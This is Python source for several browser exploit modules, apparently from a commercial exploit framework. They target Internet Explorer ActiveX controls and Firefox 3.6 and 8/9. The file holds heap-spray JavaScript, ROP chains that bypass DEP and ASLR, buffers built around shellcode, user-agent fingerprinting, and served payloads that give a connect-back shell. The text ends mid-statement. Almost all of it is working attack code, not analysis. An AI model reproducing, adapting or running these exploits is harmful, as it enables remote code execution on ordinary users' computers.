def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.alignstack = True
self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".htm"
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
self.vProtect = True
self.useRawShellcode = True
self.payloadFilename = "".join(
[random.choice(string.lowercase) for x in range(8)]) + '.exe'
self.sharefilename = "\\" + "".join(
[random.choice(string.lowercase)
for x in range(4)]) + "\\" + self.payloadFilename
return
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.use_universal = True
# We default these to false
self.HTTPMOSDEF = False
self.useSSLMOSDEF = False
self.isClientD = False
self.badstring = "\x00\x09\x0d\x20\xff"
#Randomize name for clientd
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.use_universal = True
# We default these to false
self.HTTPMOSDEF = False
self.useSSLMOSDEF = False
self.isClientD = False
#self.encode_printable = True
self.alignstack = True
#self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
self.xul_filename = self.filename[0:self.filename.index('.')] + ".xul"
self.js_filename = self.filename[0:self.filename.index('.')] + ".js"
self.trigger_name = "".join(
[random.choice(string.uppercase) for x in range(8)])
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
# Bad Chars: 80-9f (makes for extra fun)
#self.badstring = "\x00\x09\x0d\x20\xff"
self.badstring = "\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F"
#Ranomisze name for clientd
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.use_universal = True
# We default these to false
self.HTTPMOSDEF = False
self.useSSLMOSDEF = False
self.isClientD = False
self.badstring = '' # Shellcode is on heap or in dll
#Ranomisze name for clientd
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
# For IE7 .Net Shellcode
self.vProtect = True
self.pc = 0x44444444
def __init__(self):
httpclientside.__init__(self)
self.version=0
self.name=NAME
self.filename=''.join([random.choice(string.uppercase) for x in range(8)])+'.html'
# Set up our javascript obfuscator, this could be done in httpclientside class
self.jsObfuscator=JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
self.plugin_info=None # we want clientd to give us a plugin dict
self.nohttpmosdef = True #we don't have room for the large http mosdef shellcode...see maximum size in the
#encoder notes.
return
def __init__(self):
httpclientside.__init__(self)
self.version=0
self.name=NAME
self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html"
# Set up our javascript obfuscator, this could be done in httpclientside class
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
self.language = "" #"en-us" # uncomment this to default to English version
self.plugin_info = None # we want clientd to give us a plugin dict
#HTTPMOSDEF shellcode is 2100 bytes or so - our shellcode space is 2044 or so.
#XXX: We need to switch to SearchCode?
self.nohttpmosdef = True
return
def __init__(self):
httpclientside.__init__(self)
self.version = 0
self.name = NAME
self.filename = self._get_random_filename()
self.jsfilename = 'AC_RunActiveContent.js'
self.swffilename = 'Resources/CVE_2011_2110/APSB11_18.swf'
self.trojan_filename = self._get_random_filename(extension="txt")
self.language = "" #"en-us" # uncomment this to default to English version
self.plugin_info = None # we want clientd to give us a plugin dict
self.refresh_rate = 30
self.xorer = XOR.new("\x5a")
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
self.supports_dns_mosdef = True
def __init__(self):
tcpexploit.__init__(self)
httpclientside.__init__(self)
self.searchMethod = self.FindBrowser_FindAnyTag_CmpExtraInfo
self.UserAgent = [("Mozilla/", "Firefox", "")]
self.plugin_info = None # we want clientd to give us a plugin dict
self.supports_dns_mosdef = False
self.shellcode = "\xcc" * 298
self.setVersions()
self.version = 1
self.badstring = ""
self.name = NAME
self.filename = "".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html"
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.alignstack = True
self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x28\x29\x2f\x3c\x3e\x5c"
self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html"
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def __init__(self):
httpclientside.__init__(self)
self.version = 0
self.name = NAME
self.setInfo(DESCRIPTION)
self.filename = "".join([choice(ascii_lowercase)
for x in range(8)]) + ".html"
# Set up our javascript obfuscator, this could be done in httpclientside class
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
# we want clientd to give us a plugin dict
self.plugin_info = None
return
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.alignstack = True
self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
self.htmlfile = self.filename
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
self.jarfile = 'wp_oracle_java_jre7sunawt.jar'
self.autoFind = False
self.refresh_rate = 0
return
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.badstring = (
"\x00\x22\x0a\x0d\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f")
#Ranomisze name for clientd
self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS = [
"IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN",
"Execute Command"
]
# Clienside exploits default to HTTPMosdef PLAIN for clientD
DEFAULT_PAYLOAD = 2
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.use_universal = True
# We default these to false
self.HTTPMOSDEF = False
self.useSSLMOSDEF = False
self.isClientD = False
self.badstring = '' # Shellcode is on heap or in dll
#Randomise name for clientd
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
# For IE7 .Net Shellcode
self.pc = 0x44444444
return
def is_vulnerable(self, info_dict):
# Called from ClientD, if recon modules are enabled
# returns a value used to rank the exploit within attacking modules
"""
Check for IE
"""
self.isClientD = True
if "MSIE 6.0" in info_dict['user_agent']:
self.log("WP> Target has MSIE 6.0")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0] # it's a list in actuality
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
#self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if getattr(self, 'useSSLMOSDEF', False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
# Potentially called from httpserver update shellcode accordingly
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def makefile(self, ourhost):
# Exploit file
# 3F141EAE FFD6 CALL ESI
#023F4855 33C0 XOR EAX,EAX
#$023F4857 66:B8 0109 MOV AX,0901
#023F485B 03F0 ADD ESI,EAX
#023F485D FFE6 JMP ESI
filedata = """
<html>
To view the report, please enable the Crystal Reports control in the bar above.<br>
<object id='target' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
<script>
ret='';
for( counter=0; counter<=260; counter++)
ret+=unescape('%u0101%u0101');
ret+=unescape('%u1eae%u3f14') + unescape('%uc033%ub866') + unescape('%u0901%uf003') + unescape('%ue6ff%u9090');
target.ServerResourceVersion = ret;
target.URL="OURURL";
target.CancelPrinting();
</script>
<br><a href=javascript:window.close();>Close this report</a>
</html>
"""
filedata = filedata.replace(
'OURURL', ourhost + "/" + self.filename.replace('.html', '.dll'))
return filedata
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
#self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit html file')
ourhost = "http://" + clientheader.getStrValue(['Host'])
data = self.makefile(ourhost)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.dll')):
self.log('WP> Serving shellcode buffer')
data = "\x90" * 2000 + self.shellcode
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
self.log('WP> ****************************************')
return h, b
def run(self):
filedata = self.makefile('')
outputfile = wp_outputpath(self.filename)
self.log("WP> Opening %s" % outputfile)
fd = file(outputfile, 'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s' % outputfile)
return 1
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS = [
"IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN",
"Execute Command"
]
DEFAULT_PAYLOAD = 1
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.alignstack = True
self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
#Ranomisze name for clientd
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def is_vulnerable(self, info_dict):
# Called from ClientD, returns a value used to rank the exploit within attacking modules
"""
Check for IE 6
"""
self.isClientD = True
if "MSIE 6.0" in info_dict['user_agent']:
self.log("WP> Target has MSIE 6")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0] #it's a list in actuality
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s' %
(self.version, targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if self.isClientD:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def buildBypass(self, search=False):
depBp = pack('<L', 0x1F701F31) # pop eax
depBp += pack('<L', 0x1F72E644) # writeable
depBp += pack('<L', 0x10034C91) # xor ecx, ecx
depBp += pack('<L', 0x1F701F31) # pop eax
depBp += pack('<L', 0xFFFFFFC0)
depBp += pack('<L', 0x1001862A) # neg eax
depBp += pack('<L', 0x1002E3C9) # xchg ecx, eax
depBp += wp_randomstring(4)
depBp += pack('<L', 0x1F70A7CC) # pop edx
depBp += wp_randomstring(12)
depBp += pack('<L', 0xFFFFEFFF)
depBp += pack('<L', 0x100281E6) # neg edx
depBp += wp_randomstring(8)
depBp += pack('<L', 0x1001DBA6) # mov eax, edx / ret 4
depBp += wp_randomstring(16)
depBp += pack('<L', 0x10017D50) # pop esi
depBp += wp_randomstring(4)
depBp += pack('<L', 0x10024B73) # pop esi / pop edi
depBp += pack('<L', 0x10030F5A) # mov ebx, eax / call esi
depBp += pack('<L', 0x1F711346) # edi - pop eax / ret
depBp += pack('<L', 0x10017D50) # pop esi
depBp += pack('<L', 0x1003B0E4) # VirtualProtect
if search:
depBp += pack('<L', 0x1F701F31) # pop eax
depBp += pack('<L', 0xFFFFF7FF) # -801
depBp += pack('<L', 0x1002B5B2) # add ebx, eax
depBp += pack('<L', 0x1001063C) # pop ebp
depBp += pack('<L', 0x1F707DAE) # ebp - call [eax] / ret
depBp += pack('<L', 0x1F701F31) # pop eax
depBp += pack('<L', 0x1001049A) # push esp / ret 8
depBp += pack('<L', 0x10037D4B) # pushad
depBp += "\x83\xEC\x05" # sub esp, 5
return depBp
def makefile(self):
self.log("WP> Generating Universal DEP Bypass")
searchBypass = self.buildBypass(search=True)
self.log("WP> Universal DEP Bypass Size: %s bytes" % len(searchBypass))
searchcode = wp_SearchCode(True, "mov $0x01991111, %edx")
self.shellcode = self.shellcode[:17] + "\x8B\xE0" + self.shellcode[19:]
randomStr = "".join(
[random.choice(string.lowercase) for x in range(8)])
payload = wp_randomstring(628)
payload += pack('<L', 0x1F7052F6) # add esp, 7D0
payload += wp_randomstring(364)
payload += pack('<L', 0x1F701029) * 10
payload += searchBypass
payload += searchcode
payload += wp_randomstring((4096 - len(payload)))
payload += 'c00kc00k'
payload += self.buildBypass()
payload += self.shellcode
payload += wp_randomstring((10741 - len(payload)))
#Base filedata
filedata = """<html>
<object classid='clsid:F31C42E3-CBF9-4E5C-BB95-521B4E85060D' id='target'/></object>
<script language='javascript'>
arg1 = "RANDOMSTR";
arg2 = "PAYLOAD";
target.ValidateUser(arg1, arg2);
</script>
</html>
"""
filedata = filedata.replace('RANDOMSTR', randomStr)
filedata = filedata.replace('PAYLOAD', payload)
return filedata
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
#self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit file')
data = self.makefile()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def run(self):
filedata = self.makefile()
outputfile = wp_outputpath(self.filename)
self.log("WP> Opening %s for output" % outputfile)
fd = file(outputfile, 'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s' % (outputfile))
return 1
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s###########################################################
PAYLOADS = [
"IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN",
"Execute Command"
]
# Clienside exploits default to HTTPMosdef PLAIN
DEFAULT_PAYLOAD = 2
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.use_universal = True
# We default these to false
self.HTTPMOSDEF = False
self.useSSLMOSDEF = False
self.isClientD = False
#self.encode_printable = True
self.alignstack = True
#self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
self.xul_filename = self.filename[0:self.filename.index('.')] + ".xul"
self.js_filename = self.filename[0:self.filename.index('.')] + ".js"
self.trigger_name = "".join(
[random.choice(string.uppercase) for x in range(8)])
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def is_vulnerable(self, info_dict):
# Called from ClientD, returns a value used to rank the exploit within attacking modules
"""
Check for Firefox
"""
self.isClientD = True
if "Firefox/3.6" in info_dict['user_agent']:
self.log("WP> Target has Firefox/3.6")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0] #it's a list in actuality
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
#self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if getattr(self, 'useSSLMOSDEF', False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
# Potentially called from httpserver update shellcode accordingly
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def makeXUL(self):
# make the XUL file
filedata = """<?xml version="1.0"?>
<?xml-stylesheet type="text/css"?>
<window id="example-window" xmlns:html="http://www.w3.org/1999/xhtml" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<html:p>
Please wait for page to load....
</html:p>
<script src="JS_FILENAME"/>
<tree id="treeset" onselect="TRIGGER_NAME();" rows="6" flex="1">
<treecols>
<treecol id="firstname" label="." primary="true" flex="3"/>
</treecols>
<treechildren>
<treeitem container="true" open="true">
<treerow>
<treecell label="."/>
</treerow>
</treeitem>
</treechildren>
</tree>
</window>
"""
filedata = filedata.replace('JS_FILENAME', self.js_filename)
filedata = filedata.replace('TRIGGER_NAME', self.trigger_name)
outputfile = wp_outputpath(self.xul_filename)
self.log("WP> Opening XUL file %s for output" % outputfile)
fd = file(outputfile, 'wb+')
fd.write(filedata)
fd.close()
return filedata
def makeJS(self, type):
if type == 1:
sprayaddr = pack(
'<L', 0x12001000) # spray addr + pr nopslide to DEP bypass
sprayaddr += pack('<L', 0x7C341111)
h2sflip = pack('<L', 0x7C34E7BA) # heap -> stack flip
print len(self.shellcode) + 8198
depBypass = self.wp_sayonaraASLRDEPBypass(
(len(self.shellcode) + 8198))
else:
sprayaddr = pack(
'<L', 0x0a001000) # spray addr + pr nopslide to DEP bypass
sprayaddr += pack('<L', 0x77C1F815)
h2sflip = pack('<L', 0x77C3A634) # heap -> stack flip
depBypass = self.wp_UniversalDEPBypassWinXP_VP(
(len(self.shellcode) + 8198))
filedata = """
function TRIGGER_NAME()
{
var sel = document.getElementById('treeset').view.selection;
sel.tree = {
invalidateRange: function(s,e) {
sel.tree = null;
sel.clearSelection();
var container = new Array();
var addr = unescape("SPRAYADDY");
var pad = unescape("PADDING");
var big = addr;
while (big.length < 0x38) big += addr
big += unescape("H2SFLIP");
big += unescape("DEPBYPASS");
big += unescape("SHELLCODE");
while (big.length < 0x50000) big += big;
big=big.substring(0,0x50000);
var len = big.length - pad.length - 1;
for (i = 0; i < 400; ++i)
container.push(big.substring(0, len) + pad);
}
}
}
function TIMER()
{
var tree = document.getElementById('treeset');
tree.selected=true;
tree.focus();
tree.view.selection.select(0);
alert("Waiting?");
}
setTimeout("TIMER()",2000);
"""
filedata = filedata.replace('TRIGGER_NAME', self.trigger_name)
filedata = filedata.replace('H2SFLIP', wp_urluencode(h2sflip))
filedata = filedata.replace('SPRAYADDY', wp_urluencode(sprayaddr))
filedata = filedata.replace('PADDING',
wp_urluencode(wp_randomstring(8)))
filedata = filedata.replace('DEPBYPASS', wp_urluencode(depBypass))
filedata = filedata.replace(
'SHELLCODE',
wp_urluencode(
wp_randomnops(8192, self.badstring) +
"\x81\xC4\x06\x20\x00\x00" + self.shellcode +
(wp_randomstring(100))))
filedata = filedata.replace('TIMER', wp_randomstring(10))
outputfile = wp_outputpath(self.js_filename)
self.log("WP> Opening .JS file %s for output" % outputfile)
fd = file(outputfile, 'wb+')
fd.write(filedata)
fd.close()
return filedata
def makeHTML(self, type):
filedata = ""
if type == 1:
filedata = """<embed type="application/x-java-applet" code="jreVerify.class" codebase="/jsp_utils/" width="1" height="2" jumpto="/en/download/installed.jsp?" pause="2000" />
"""
filedata += """<script>document.location="XUL_FILENAME"</script>"""
filedata = filedata.replace('XUL_FILENAME', self.xul_filename)
outputfile = wp_outputpath(self.filename)
self.log("WP> Opening HTML file %s for output" % outputfile)
fd = file(outputfile, 'wb+')
fd.write(filedata)
fd.close()
return filedata
def makefile(self, browser, osversion):
self.xul_filename = self.filename[0:self.filename.index('.')] + ".xul"
self.js_filename = self.filename[0:self.filename.index('.')] + ".js"
if osversion == "Windows XP":
self.log('WP> Generating Windows XP Universal exploit')
self.makeHTML(0)
self.makeXUL()
self.makeJS(0)
else:
self.log('WP> Generating Windows Universal ASLR + DEP Exploit')
self.makeHTML(1)
self.makeXUL()
self.makeJS(1)
return
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
cookies = clientheader.getStrValue(['Cookie'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
if clientheader.URL.count(self.filename):
if cookies.count("SessionID"):
self.log('WP> Exploit already sent to this client')
self.log('WP> Returning blank page')
data = ""
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
else:
self.log('WP> Serving exploit html file %s' % self.filename)
if osversion == "Windows XP":
data = self.makeHTML(0)
else:
data = self.makeHTML(1)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif clientheader.URL.count(self.xul_filename):
self.log('WP> Serving exploit XUL file %s' % self.xul_filename)
data = self.makeXUL()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'application/vnd.mozilla.xul+xml')
elif clientheader.URL.count(self.js_filename):
self.log('WP> Serving exploit .js file %s' % self.js_filename)
if osversion == "Windows XP":
data = self.makeJS(0)
else:
data = self.makeJS(1)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'application/x-javascript')
elif clientheader.URL.count("favicon.ico"):
self.log('WP> Serving blank icon')
b.setBody("")
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def run(self):
if self.version == 1:
self.makefile("", "")
else:
self.makefile("Windows XP", "")
self.log("WP> Output complete")
return 1
class theexploit(wp_exploit, httpclientside):
PAYLOADS = ["IE Inject Connect Back"]
DEFAULT_PAYLOAD = 0
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.alignstack = True
self.HTTPMOSDEF = False
self.useSSLMOSDEF = False
self.isClientD = False
self.badstring = "\x00\x5c"
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def is_vulnerable(self, info_dict):
"""
Check for IE
"""
self.isClientD = True
if "Firefox/9" in info_dict['user_agent']:
self.log("WP> Target has Firefox/9")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0] #it's a list in actuality
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
elif "Firefox/8" in info_dict['user_agent']:
self.log("WP> Target has Firefox/8")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0] #it's a list in actuality
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s' %
(self.version, targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
if getattr(self, 'useSSLMOSDEF', False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
self.wp_getShellcodeType()
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def makefile2003(self):
sprayaddr = pack('<L', 0x0C101C0C) # spray addr
sprayaddr += pack('<L', 0x77BABF55) # pop - XP
depSc = pack('<L', 0x77BCB802)
depSc += self.wp_UniversalDEPBypassWin2k3_VP(
(len(self.shellcode) + 16))
depSc += self.shellcode
depSc += wp_randomstring(2432 - len(depSc))
filedata = """<html>
<head>
<script>
var shellcode = unescape("PAYLOAD");
var targetsize = 0x40000;
var offset_length = 0x606;
for (var i=0; i < 0x800; i++)
{
var randomnumber1=Math.floor(Math.random()*90)+10;
var randomnumber2=Math.floor(Math.random()*90)+10;
var randomnumber3=Math.floor(Math.random()*90)+10;
var randomnumber4=Math.floor(Math.random()*90)+10;
var paddingstr = "%u" + randomnumber1.toString() + randomnumber2.toString();
paddingstr += "%u" + randomnumber3.toString() + randomnumber4.toString();
var padding = unescape(paddingstr);
while (padding.length < 0x1000) padding+= padding;
junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + shellcode;
single_sprayblock += padding.substring(0,0x800 - offset_length - shellcode.length);
while (single_sprayblock.length < targetsize) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (targetsize-6)/2);
varname = "var" + randomnumber1.toString() + randomnumber2.toString();
varname += randomnumber3.toString() + randomnumber4.toString();
thisvarname = "var " + varname + "= '" + sprayblock +"';";
eval(thisvarname);
}
function run() {
var attr = document.createAttribute("foo");
attr.value = "bar";
var ni = document.createNodeIterator(
attr, NodeFilter.SHOW_ALL,
{acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; }}
,false);
ni.nextNode();
ni.nextNode();
ni.previousNode();
attr.value = null;
const addr = unescape("RANDPAD");
var container = new Array();
var small = unescape("SPRAYADDR");
while (small.length != 30)
small += addr;
for (i = 0; i < 1024*1024*2; ++i)
container.push(unescape(small));
ni.referenceNode;
}
</script>
</head>
<body onload="run();">
</body>
</html>
"""
filedata = filedata.replace('PAYLOAD', wp_urluencode(depSc))
filedata = filedata.replace('SPRAYADDR', wp_urluencode(sprayaddr))
filedata = filedata.replace('RANDPAD',
